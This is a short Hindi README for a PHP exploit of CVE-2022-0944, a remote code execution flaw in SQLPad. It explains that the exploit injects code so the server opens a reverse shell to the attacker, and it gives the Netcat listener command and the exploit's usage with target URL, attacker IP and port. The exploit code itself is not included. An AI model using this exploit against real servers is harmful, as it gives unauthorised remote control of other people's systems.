
CVE-2022-0944 दूरस्थ कोड निष्पादन शोषण
यह PHP कोड SQLPad में CVE-2022-0944 से संबंधित एक रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी का शोषण करने के लिए डिज़ाइन किया गया है।
यह SQLPad एप्लिकेशन में दुर्भावनापूर्ण कोड इंजेक्ट करके काम करता है, और इसे एक सिस्टम कमांड निष्पादित करने के लिए मजबूर करता है जो एक रिवर्स शेल खोलता है – एक कनेक्शन जो हमलावर को कमजोर सिस्टम का दूरस्थ नियंत्रण प्रदान करता है।
sudo apt-get install php-clisudo apt-get install php-curlरिवर्स शेल कनेक्शन कैप्चर करने के लिए, हमलावर की मशीन पर Netcat प्रारंभ करें:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: कमजोर SQLPad का मूल URL (जैसे, http://target.com:3000)
<attacker_ip>: रिवर्स कनेक्शन सुनने वाला हमलावर का IP पता (Netcat IP के समान)
<attacker_port>: जिस पोर्ट पर हमलावर सुन रहा है (Netcat पोर्ट के समान)
मूल एक्सप्लॉइट तर्क इस रिपॉजिटरी पर आधारित था:
यहाँ मेरा लक्ष्य एक्सप्लॉइट तर्क को समझना और इसे एक व्यक्तिगत चुनौती के रूप में दूसरी प्रोग्रामिंग भाषा में फिर से लिखना था।
अतिरिक्त संदर्भ: 🔗 CVE-2022-0944 – NVD